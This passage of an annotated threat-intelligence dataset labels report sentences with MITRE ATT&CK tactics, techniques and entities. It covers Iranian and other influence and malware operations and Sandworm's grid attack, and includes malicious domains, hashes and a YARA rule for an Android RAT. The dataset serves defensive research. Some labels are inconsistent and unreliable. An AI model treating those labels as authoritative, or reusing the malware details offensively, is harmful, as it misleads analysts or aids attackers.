"label": "Infrastructure_Indicator" }, { "text": "used fake accounts and duplicate Pages", "start": 60, "end": 98, "label": "Action" }, { "text": "inauthentically amplify both political and entertainment content", "start": 102, "end": 166, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p23-s177-f765df", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 23, "sentence_id": 177, "context_before": "In one case, we found a social media management agency that used fake accounts and duplicate Pages to inauthentically amplify both political and entertainment content.", "sentence_text": "In other cases, we found and removed inauthentic engagement activity run by the same people in support of multiple candidates in the same election at once.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "run inauthentic engagement activity in support of multiple candidates", "entities": [ { "text": "the same people ", "start": 76, "end": 92, "label": "ThreatActor" } ] }, { "uid": "mitre-82_mitre_report-p23-s178-796989", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 23, "sentence_id": 178, "context_before": "In other cases, we found and removed inauthentic engagement activity run by the same people in support of multiple candidates in the same election at once.", "sentence_text": "In the lead-up to the elections, we’ve taken down about a dozen clusters of activity focused on fake engagement.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p23-s179-fbded6", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 23, "sentence_id": 179, "context_before": "In the lead-up to the elections, we’ve taken down about a dozen clusters of activity focused on fake engagement.", "sentence_text": "We’re continuing to closely monitor the situation in the lead-up to the May election in the Philippines and will take action if we find violating activity attempting to leverage people’s interest in the election using IB tactics.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p23-s180-a8f255", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 23, "sentence_id": 180, "context_before": "We’re continuing to closely monitor the situation in the lead-up to the May election in the Philippines and will take action if we find violating activity attempting to leverage people’s interest in the election using IB tactics.", "sentence_text": "ADVERSARIAL THREAT REPORT 23", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p24-s182-990c23", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 24, "sentence_id": 182, "context_before": "Appendix: Threat indicators 1.", "sentence_text": "UNC788, Iran Domains & C2s • bnt2[.]live • archery.dedyn[.]io • market.vinam[.]me • signin.dedyn[.]io • Market.dedyn[.]io Hashes • 43535540e94b39279af925e9548dce7f • 9b91427d195b8b7e75fbbc29a798bede • aaa55f1e48aba8856661fedc0074e81a • 6e0ec6bd0bef489c83c2dce4876de5c8 • 70875705e8bc3887cec4ef1873cdb152 • aa7330d2d360cac61394843d8af730bb • ab533be4ff9c99e8a03bc4cd413badb6 Yara rule rule hilal_rat_dex: { meta:\nsource = \"Facebook\" date = \"2022-04-07\" description = \"Detects custom android rat impersonating various applications that siphons phone details to a C2.\"", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1204.002", "name": "Malicious File" } ], "procedure": "malware siphons phone details and sends them to a C2 server", "entities": [ { "text": "UNC788", "start": 0, "end": 6, "label": "ThreatActor" }, { "text": "hilal_rat_dex", "start": 389, "end": 402, "label": "MalwareTool" }, { "text": "custom android rat", "start": 475, "end": 493, "label": "MalwareTool" }, { "text": "various applications", "start": 508, "end": 528, "label": "MalwareTool" }, { "text": "43535540e94b39279af925e9548dce7f ", "start": 131, "end": 164, "label": "MalwareTool" }, { "text": "9b91427d195b8b7e75fbbc29a798bede", "start": 166, "end": 198, "label": "MalwareTool" }, { "text": "aaa55f1e48aba8856661fedc0074e81a • 6e0ec6bd0bef489c83c2dce4876de5c8", "start": 201, "end": 268, "label": "MalwareTool" }, { "text": "70875705e8bc3887cec4ef1873cdb152 • aa7330d2d360cac61394843d8af730bb", "start": 271, "end": 338, "label": "MalwareTool" }, { "text": "ab533be4ff9c99e8a03bc4cd413badb6", "start": 341, "end": 373, "label": "MalwareTool" }, { "text": "bnt2[.]live ", "start": 29, "end": 41, "label": "Infrastructure_Indicator" }, { "text": "archery.dedyn[.]io", "start": 43, "end": 61, "label": "Infrastructure_Indicator" }, { "text": "market.vinam[.]me ", "start": 64, "end": 82, "label": "Infrastructure_Indicator" }, { "text": "signin.dedyn[.]io", "start": 84, "end": 101, "label": "Infrastructure_Indicator" }, { "text": "Market.dedyn[.]io", "start": 104, "end": 121, "label": "Infrastructure_Indicator" }, { "text": "siphons phone details to a C2", "start": 534, "end": 563, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p24-s183-fa5a58", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 24, "sentence_id": 183, "context_before": "UNC788, Iran Domains & C2s • bnt2[.]live • archery.dedyn[.]io • market.vinam[.]me • signin.dedyn[.]io • Market.dedyn[.]io Hashes • 43535540e94b39279af925e9548dce7f • 9b91427d195b8b7e75fbbc29a798bede • aaa55f1e48aba8856661fedc0074e81a • 6e0ec6bd0bef489c83c2dce4876de5c8 • 70875705e8bc3887cec4ef1873cdb152 • aa7330d2d360cac61394843d8af730bb • ab533be4ff9c99e8a03bc4cd413badb6 Yara rule rule hilal_rat_dex: { meta:\nsource = \"Facebook\" date = \"2022-04-07\" description = \"Detects custom android rat impersonating various applications that siphons phone details to a C2.\"", "sentence_text": "strings:\n$class0 = \"Lcom/hilal/SysUpdater/MainActivity;\" $class1 = \"Lcom/hilal/adm/R;\" $file0 = \"cacaca.dat\" $file1 = \"ccc.dat\" $file2 = \"fifi.dat\" $file3 = \"smr.dat\" $file4 = \"smse.dat\" ADVERSARIAL THREAT REPORT 24", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p25-s184-c73cd8", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 25, "sentence_id": 184, "context_before": "strings:\n$class0 = \"Lcom/hilal/SysUpdater/MainActivity;\" $class1 = \"Lcom/hilal/adm/R;\" $file0 = \"cacaca.dat\" $file1 = \"ccc.dat\" $file2 = \"fifi.dat\" $file3 = \"smr.dat\" $file4 = \"smse.dat\" ADVERSARIAL THREAT REPORT 24", "sentence_text": "$typo0 = \"Erron in Decryption\" $typo1 = \"GetDevcie\" $sec1 = \"6123cc12ef9bd0bf1592c69bf769853fb0a00084\" // AES key $cmd0 = \"/Aud\" $cmd1 = \"/Cam\" $cmd2 = \"/Upd\" $cmd3 = \"/Con\" $func1 = \"CamStart\" $func2 = \"AudStop\" $func3 = \"AudStart\" $func4 = \"DownFi\" $func5 = \"ScrSht\" $func6 = \"CamList\" $func7 = \"CamStop\" $func8 = \"ListExplore\" $interesting_string0 = \"isMyServiceRunning?\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p25-s185-9bbd55", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 25, "sentence_id": 185, "context_before": "$typo0 = \"Erron in Decryption\" $typo1 = \"GetDevcie\" $sec1 = \"6123cc12ef9bd0bf1592c69bf769853fb0a00084\" // AES key $cmd0 = \"/Aud\" $cmd1 = \"/Cam\" $cmd2 = \"/Upd\" $cmd3 = \"/Con\" $func1 = \"CamStart\" $func2 = \"AudStop\" $func3 = \"AudStart\" $func4 = \"DownFi\" $func5 = \"ScrSht\" $func6 = \"CamList\" $func7 = \"CamStop\" $func8 = \"ListExplore\" $interesting_string0 = \"isMyServiceRunning?\"", "sentence_text": "$interesting_string1 = \"Checking new version... Please wait...\" $notification_service0 = \"********** onNotificationPosted\" $notification_service1 = \"********** onNOtificationRemoved\" $phnum = \"PhNumber\" condition:\nfiletype_dex and\n10 of them or all of ($file*)\nor all of ($func*)\nor all of ($interesting_*) and all of ($notification_*)\n}\nADVERSARIAL THREAT REPORT 25", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p26-s186-737473", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 26, "sentence_id": 186, "context_before": "$interesting_string1 = \"Checking new version... Please wait...\" $notification_service0 = \"********** onNotificationPosted\" $notification_service1 = \"********** onNOtificationRemoved\" $phnum = \"PhNumber\" condition:\nfiletype_dex and\n10 of them or all of ($file*)\nor all of ($func*)\nor all of ($interesting_*) and all of ($notification_*)\n}\nADVERSARIAL THREAT REPORT 25", "sentence_text": "2. Previously unreported group (Iran)\nDomains & C2s • alharbitelecom[.]co • lukoil[.]in • apply-jobs[.]com •", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p26-s187-143338", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 26, "sentence_id": 187, "context_before": "2. Previously unreported group (Iran)\nDomains & C2s • alharbitelecom[.]co • lukoil[.]in • apply-jobs[.]com •", "sentence_text": "mastergatevpn[.]com • applytalents[.]com • microsoftcdn[.]co • appslocallogin[.]online • microsoftdefender[.]info • careers-finder[.]com • microsoftedgesh[.]info • cloudgoogle[.]co • mideasthiring[.]com • cortanaservice[.]com • office-shop[.]me • cortanaupdate[.]co • onedrivelive[.]me • defenderupdate[.]ddns[.]net • onedriveupdate[.]net • edge-cloudservices[.]com • online-audible[.]com • elecresearch[.]org • online-chess[.]live • enerflex[.]ddns[.]net • outlookde[.]live • enerflex[.]org • outlookdelivery[.]com • etisalatonline[.]com • remgrogroup[.]com • exprogroup[.]org • saipem[.]org • freechess[.]live • sauditourismguide[.]com • funnychess[.]online • savemoneytrick[.]com • getadobe[.]ddns[.]net • sharepointnotify[.]com • getadobe[.]net • sparrowsgroup[.]org • globaltalent[.]in • supportskype[.]com • googleservices[.]co • talent-recruitment[.]org • googleupdate[.]co • talktalky[.]azurewebsites[.]net • helpdesk-product[.]com • thefreemovies[.]net • khaleejtimes[.]co • updateddns[.]ddns[.]net • librarycollection[.]org • updatedefender[.]net • linkedinz[.]me • updatedns[.]ddns[.]net • listen-books[.]com • updateservices[.]co ADVERSARIAL THREAT REPORT 26", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p27-s188-972fc2", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 27, "sentence_id": 188, "context_before": "mastergatevpn[.]com • applytalents[.]com • microsoftcdn[.]co • appslocallogin[.]online • microsoftdefender[.]info • careers-finder[.]com • microsoftedgesh[.]info • cloudgoogle[.]co • mideasthiring[.]com • cortanaservice[.]com • office-shop[.]me • cortanaupdate[.]co • onedrivelive[.]me • defenderupdate[.]ddns[.]net • onedriveupdate[.]net • edge-cloudservices[.]com • online-audible[.]com • elecresearch[.]org • online-chess[.]live • enerflex[.]ddns[.]net • outlookde[.]live • enerflex[.]org • outlookdelivery[.]com • etisalatonline[.]com • remgrogroup[.]com • exprogroup[.]org • saipem[.]org • freechess[.]live • sauditourismguide[.]com • funnychess[.]online • savemoneytrick[.]com • getadobe[.]ddns[.]net • sharepointnotify[.]com • getadobe[.]net • sparrowsgroup[.]org • globaltalent[.]in • supportskype[.]com • googleservices[.]co • talent-recruitment[.]org • googleupdate[.]co • talktalky[.]azurewebsites[.]net • helpdesk-product[.]com • thefreemovies[.]net • khaleejtimes[.]co • updateddns[.]ddns[.]net • librarycollection[.]org • updatedefender[.]net • linkedinz[.]me • updatedns[.]ddns[.]net • listen-books[.]com • updateservices[.]co ADVERSARIAL THREAT REPORT 26", "sentence_text": "3. Azerbaijan\nDomains\n• localadmin[.]online\n• localadmin[.]ru\n• analyzeryandex[.]000webhostapp[.]com\n• vote2021[.]w3spaces[.]com\nCredential phishing URLs • localadmin[.]online/votes/security • localadmin[.]online/vote • localadmin[.]online/vote/fb/login.html 4.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p27-s189-e77c3b", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 27, "sentence_id": 189, "context_before": "3. Azerbaijan\nDomains\n• localadmin[.]online\n• localadmin[.]ru\n• analyzeryandex[.]000webhostapp[.]com\n• vote2021[.]w3spaces[.]com\nCredential phishing URLs • localadmin[.]online/votes/security • localadmin[.]online/vote • localadmin[.]online/vote/fb/login.html 4.", "sentence_text": "CIB: Costa Rica, El Salvador Domains • latinoamericareporta[.]com • revistadcr[.]com 5.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p27-s191-91498d", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 27, "sentence_id": 191, "context_before": "CIB:", "sentence_text": "Russia, Ukraine Domains • kavkazru[.]press • politica[.]in[.]ua 6.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p27-s193-1f3e27", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 27, "sentence_id": 193, "context_before": "CIB:", "sentence_text": "Russia, Ukraine Domains • monitor-ua[.]com • ukraine2day[.]com ADVERSARIAL THREAT REPORT 27", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s1-0b4253", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "In late 2022, Mandiant responded to a disruptive cyber physical incident in which the Russia-linked threat actor Sandworm targeted a Ukrainian critical infrastructure organization.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1499", "name": "Endpoint Denial of Service" } ], "procedure": "Targeted a Ukranian critical infrastructure organization", "entities": [ { "text": "Russia-linked threat actor ", "start": 86, "end": 113, "label": "ThreatActor" }, { "text": "krainian critical infrastructure", "start": 134, "end": 166, "label": "Infrastructure_Indicator" }, { "text": "targeted a Ukrainian critical infrastructure organization", "start": 122, "end": 179, "label": "Action" } ] }, { "uid": "mitre-83_mitre_report-p1-s2-5a9ba9", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 2, "context_before": "In late 2022, Mandiant responded to a disruptive cyber physical incident in which the Russia-linked threat actor Sandworm targeted a Ukrainian critical infrastructure organization.", "sentence_text": "This incident was a multi-event cyber attack that leveraged a novel technique for impacting industrial control systems (ICS) / operational technology (OT).", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1499", "name": "Endpoint Denial of Service" } ], "procedure": "leveraged a novel technique for impacting industrial control systems/ operational technology", "entities": [ { "text": "novel technique", "start": 62, "end": 77, "label": "MalwareTool" }, { "text": "industrial control systems (ICS)", "start": 92, "end": 124, "label": "Infrastructure_Indicator" }, { "text": "operational technology (OT)", "start": 127, "end": 154, "label": "Infrastructure_Indicator" }, { "text": " leveraged a novel technique ", "start": 49, "end": 78, "label": "Action" }, { "text": "impacting industrial control systems", "start": 82, "end": 118, "label": "Action" } ] }, { "uid": "mitre-83_mitre_report-p1-s3-af357f", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 3, "context_before": "This incident was a multi-event cyber attack that leveraged a novel technique for impacting industrial control systems (ICS) / operational technology (OT).", "sentence_text": "The actor first used OT-level living off the land (LotL) techniques to likely trip the victim’s substation circuit breakers, causing an unplanned power outage that coincided with mass missile strikes on critical infrastructure across Ukraine.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1499", "name": "Endpoint Denial of Service" } ], "procedure": "used OT-level LOTL techniques to trip substation circuit breakers, causing a power outage", "entities": [ { "text": "The actor ", "start": 0, "end": 10, "label": "ThreatActor" }, { "text": " OT-level living off the land (LotL) techniques ", "start": 20, "end": 68, "label": "MalwareTool" }, { "text": "the victim’s substation circuit breakers", "start": 83, "end": 123, "label": "Infrastructure_Indicator" }, { "text": " critical infrastructure across Ukraine", "start": 202, "end": 241, "label": "Infrastructure_Indicator" }, { "text": "used OT-level living off the land (LotL) techniques ", "start": 16, "end": 68, "label": "Action" }, { "text": " trip the victim’s substation circuit breakers", "start": 77, "end": 123, "label": "Action" }, { "text": "causing an unplanned power outage that coincided with mass missile strikes", "start": 125, "end": 199, "label": "Action" } ] }, { "uid": "mitre-83_mitre_report-p1-s4-034b71", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 4, "context_before": "The actor first used OT-level living off the land (LotL) techniques to likely trip the victim’s substation circuit breakers, causing an unplanned power outage that coincided with mass missile strikes on critical infrastructure across Ukraine.", "sentence_text": "Sandworm later conducted a second disruptive event by deploying a new variant of CADDYWIPER in the victim’s IT environment.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1485", "name": "Data Destruction" } ], "procedure": "constructed a second disruptive event by deploying a new variant of CADDYWIPER in the victim's IT environment", "entities": [ { "text": "Sandworm", "start": 0, "end": 8, "label": "ThreatActor" }, { "text": "CADDYWIPER", "start": 81, "end": 91, "label": "MalwareTool" }, { "text": " victim’s IT environment", "start": 98, "end": 122, "label": "Infrastructure_Indicator" }, { "text": "conducted a second disruptive event", "start": 15, "end": 50, "label": "Action" }, { "text": "deploying a new variant of CADDYWIPER", "start": 54, "end": 91, "label": "Action" } ] }, { "uid": "mitre-83_mitre_report-p1-s5-594972", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 5, "context_before": "Sandworm later conducted a second disruptive event by deploying a new variant of CADDYWIPER in the victim’s IT environment.", "sentence_text": "This attack represents the latest evolution in Russia’s cyber physical attack capability, which has been increasingly visible since Russia’s invasion of Ukraine.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s6-2c0401", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 6, "context_before": "This attack represents the latest evolution in Russia’s cyber physical attack capability, which has been increasingly visible since Russia’s invasion of Ukraine.", "sentence_text": "By using LotL techniques, the actor likely decreased the time and resources required to conduct its cyber physical attack.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1562.001", "name": "Disable or Modify Tools" } ], "procedure": "used Lotl techniques to conduct its cyber physical attack", "entities": [ { "text": "the actor", "start": 26, "end": 35, "label": "Action" }, { "text": "LotL techniques,", "start": 9, "end": 25, "label": "MalwareTool" }, { "text": "using LotL techniques,", "start": 3, "end": 25, "label": "Action" }, { "text": "decreased the time and resources required to conduct its cyber physical attack.", "start": 43, "end": 122, "label": "Action" } ] }, { "uid": "mitre-83_mitre_report-p1-s7-a45b7a", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 7, "context_before": "By using LotL techniques, the actor likely decreased the time and resources required to conduct its cyber physical attack.", "sentence_text": "While Mandiant was unable to determine the initial intrusion point, our analysis suggests the OT component of this attack may have been developed in as little as two months.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s8-67340a", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 8, "context_before": "While Mandiant was unable to determine the initial intrusion point, our analysis suggests the OT component of this attack may have been developed in as little as two months.", "sentence_text": "This indicates that the threat actor is likely capable of quickly developing similar capabilities against other OT systems from different original equipment manufacturers (OEMs) leveraged across the world.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s9-a3c594", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 9, "context_before": "This indicates that the threat actor is likely capable of quickly developing similar capabilities against other OT systems from different original equipment manufacturers (OEMs) leveraged across the world.", "sentence_text": "We initially tracked this activity as UNC3810 before merging the cluster with Sandworm.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s10-6e3a98", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 10, "context_before": "We initially tracked this activity as UNC3810 before merging the cluster with Sandworm.", "sentence_text": "Sandworm is a full-spectrum threat actor that has carried out espionage, influence and attack operations in support of Russia's Main Intelligence Directorate (GRU) since at least 2009.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1490", "name": "Inhibit System Recovery" } ], "procedure": "carried out espionage, and attack operations", "entities": [ { "text": "Sandworm", "start": 0, "end": 8, "label": "ThreatActor" }, { "text": "Russia's Main Intelligence Directorate (GRU)", "start": 119, "end": 163, "label": "ThreatActor" }, { "text": "carried out espionage, influence and attack operations", "start": 50, "end": 104, "label": "Action" } ] }, { "uid": "mitre-83_mitre_report-p1-s11-773f93", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 11, "context_before": "Sandworm is a full-spectrum threat actor that has carried out espionage, influence and attack operations in support of Russia's Main Intelligence Directorate (GRU) since at least 2009.", "sentence_text": "Beyond Ukraine, the group continues to sustain espionage operations that are global in scope and illustrative of the Russian military's far-reaching ambitions and interests in other regions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s12-54a9e7", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 12, "context_before": "Beyond Ukraine, the group continues to sustain espionage operations that are global in scope and illustrative of the Russian military's far-reaching ambitions and interests in other regions.", "sentence_text": "Government indictments have linked the group to the Main Center for Special Technologies (also known as GTsST and Military Unit 74455).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s13-139823", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 13, "context_before": "Government indictments have linked the group to the Main Center for Special Technologies (also known as GTsST and Military Unit 74455).", "sentence_text": "Given Sandworm’s global threat activity and novel OT capabilties, we urge OT asset owners to take action to mitigate this threat.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s14-ce9613", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 14, "context_before": "Given Sandworm’s global threat activity and novel OT capabilties, we urge OT asset owners to take action to mitigate this threat.", "sentence_text": "If you need support responding to related activity, please contact .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s15-20397d", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 15, "context_before": "If you need support responding to related activity, please contact .", "sentence_text": "While we were unable to identify the initial access vector into the IT environment, Sandworm gained access to the OT environment through a hypervisor that hosted a supervisory control and data acquisition (SCADA) management instance for the victim’s substation environment.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Sandworm gained access to the OT environment via a compromised hypervisor hosting a SCADA management instance in the victim’s substation environment.", "entities": [ { "text": "Sandworm", "start": 84, "end": 92, "label": "ThreatActor" }, { "text": "gained access to the OT environment", "start": 93, "end": 128, "label": "Action" }, { "text": "hypervisor", "start": 139, "end": 149, "label": "Infrastructure_Indicator" }, { "text": "supervisory control and data acquisition (SCADA) management instance", "start": 164, "end": 232, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-83_mitre_report-p1-s16-332c70", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 16, "context_before": "While we were unable to identify the initial access vector into the IT environment, Sandworm gained access to the OT environment through a hypervisor that hosted a supervisory control and data acquisition (SCADA) management instance for the victim’s substation environment.", "sentence_text": "Based on evidence of lateral movement, the attacker potentially had access to the SCADA system for up to three months.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1021", "name": "Remote Services" } ], "procedure": "maintained access to SCADA system for months after lateral movement", "entities": [ { "text": "he attacker ", "start": 40, "end": 52, "label": "ThreatActor" }, { "text": "SCADA system ", "start": 82, "end": 95, "label": "Infrastructure_Indicator" }, { "text": "lateral movement", "start": 21, "end": 37, "label": "Action" }, { "text": "had access to the SCADA system ", "start": 64, "end": 95, "label": "Action" } ] }, { "uid": "mitre-83_mitre_report-p1-s17-8a3302", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 17, "context_before": "Based on evidence of lateral movement, the attacker potentially had access to the SCADA system for up to three months.", "sentence_text": "On October 10, the actor leveraged an optical disc (ISO) image named “a.iso” to execute a native MicroSCADA binary in a likely attempt to execute malicious control commands to switch off substations.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T0894", "name": "" }, { "id": "T1499", "name": "Endpoint Denial of Service" } ], "procedure": "used an ISO image to execute a MicroSCADA binary and attempt malicious commands to switch of substations", "entities": [ { "text": "the actor ", "start": 15, "end": 25, "label": "ThreatActor" }, { "text": "optical disc (ISO) image named “a.iso” ", "start": 38, "end": 77, "label": "MalwareTool" }, { "text": "native MicroSCADA binary", "start": 90, "end": 114, "label": "MalwareTool" }, { "text": "substations.", "start": 187, "end": 199, "label": "Infrastructure_Indicator" }, { "text": "leveraged an optical disc (ISO) image named “a.iso” to execute a native MicroSCADA binary", "start": 25, "end": 114, "label": "Action" }, { "text": "execute malicious control commands to switch off substations", "start": 138, "end": 198, "label": "Action" } ] }, { "uid": "mitre-83_mitre_report-p1-s18-eb6171", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 18, "context_before": "On October 10, the actor leveraged an optical disc (ISO) image named “a.iso” to execute a native MicroSCADA binary in a likely attempt to execute malicious control commands to switch off substations.", "sentence_text": "The ISO file contained at least the following:\n“lun.vbs”, which runs n.bat “n.bat”, which likely runs the native scilc.exe utility “s1.txt”, which likely contains the unauthorized MicroSCADA commands Based on a September 23 timestamp of “lun.vbs”, there was potentially a two-month time period from when the attacker gained initial access to the SCADA system to when they developed the OT capability.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1204.002", "name": "Malicious File" } ], "procedure": "ISO contained scripts and a command file for SCADA execution", "entities": [ { "text": "the attacker", "start": 304, "end": 316, "label": "ThreatActor" }, { "text": " ISO file", "start": 3, "end": 12, "label": "MalwareTool" }, { "text": "“lun.vbs”", "start": 47, "end": 56, "label": "MalwareTool" }, { "text": "“n.bat”", "start": 75, "end": 82, "label": "MalwareTool" }, { "text": "scilc.exe", "start": 113, "end": 122, "label": "MalwareTool" }, { "text": "s1.txt", "start": 132, "end": 138, "label": "MalwareTool" }, { "text": "unauthorized MicroSCADA commands", "start": 167, "end": 199, "label": "MalwareTool" }, { "text": "SCADA system ", "start": 346, "end": 359, "label": "Infrastructure_Indicator" }, { "text": "runs n.bat", "start": 64, "end": 74, "label": "Action" }, { "text": " runs the native scilc.exe utility ", "start": 96, "end": 131, "label": "Action" } ] }, { "uid": "mitre-83_mitre_report-p1-s19-86ae48", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 19, "context_before": "The ISO file contained at least the following:\n“lun.vbs”, which runs n.bat “n.bat”, which likely runs the native scilc.exe utility “s1.txt”, which likely contains the unauthorized MicroSCADA commands Based on a September 23 timestamp of “lun.vbs”, there was potentially a two-month time period from when the attacker gained initial access to the SCADA system to when they developed the OT capability.", "sentence_text": "Although we were not able to fully recover the ICS command execution implemented by the binary, we are aware that the attack resulted in an unscheduled power outage.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1499", "name": "Endpoint Denial of Service" } ], "procedure": "caused an unscheduled power outage", "entities": [ { "text": "recover the ICS command execution ", "start": 35, "end": 69, "label": "Action" } ] }, { "uid": "mitre-83_mitre_report-p1-s20-806d80", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 20, "context_before": "Although we were not able to fully recover the ICS command execution implemented by the binary, we are aware that the attack resulted in an unscheduled power outage.", "sentence_text": "Two days after the OT event, Sandworm deployed a new variant of CADDYWIPER in the victim’s IT environment to cause further disruption and potentially to remove forensic artifacts.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1485.001", "name": "Lifecycle-Triggered Deletion" } ], "procedure": "deployed a new CADDYWIPER variant to disrupt operations and potentially remove forensic artificats", "entities": [ { "text": "Sandworm ", "start": 29, "end": 38, "label": "ThreatActor" }, { "text": "CADDYWIPER", "start": 64, "end": 74, "label": "MalwareTool" }, { "text": "victim’s IT environment", "start": 82, "end": 105, "label": "Infrastructure_Indicator" }, { "text": "deployed a new variant of CADDYWIPER ", "start": 38, "end": 75, "label": "Action" }, { "text": " remove forensic artifacts", "start": 152, "end": 178, "label": "Action" } ] }, { "uid": "mitre-83_mitre_report-p1-s21-02f838", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 21, "context_before": "Two days after the OT event, Sandworm deployed a new variant of CADDYWIPER in the victim’s IT environment to cause further disruption and potentially to remove forensic artifacts.", "sentence_text": "However, we note that the wiper deployment was limited to the victim’s IT environment and did not impact the hypervisor or the SCADA virtual machine.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1485.001", "name": "Lifecycle-Triggered Deletion" } ], "procedure": "wiper deployment was limited to the victim's IT enviroment and did not imoact the hypervisor or the SCADA virtual machine", "entities": [ { "text": "wiper deployment ", "start": 26, "end": 43, "label": "MalwareTool" }, { "text": "victim’s IT environment", "start": 62, "end": 85, "label": "Infrastructure_Indicator" }, { "text": " hypervisor ", "start": 108, "end": 120, "label": "Infrastructure_Indicator" }, { "text": "SCADA virtual machine", "start": 127, "end": 148, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-83_mitre_report-p1-s22-df2e92", 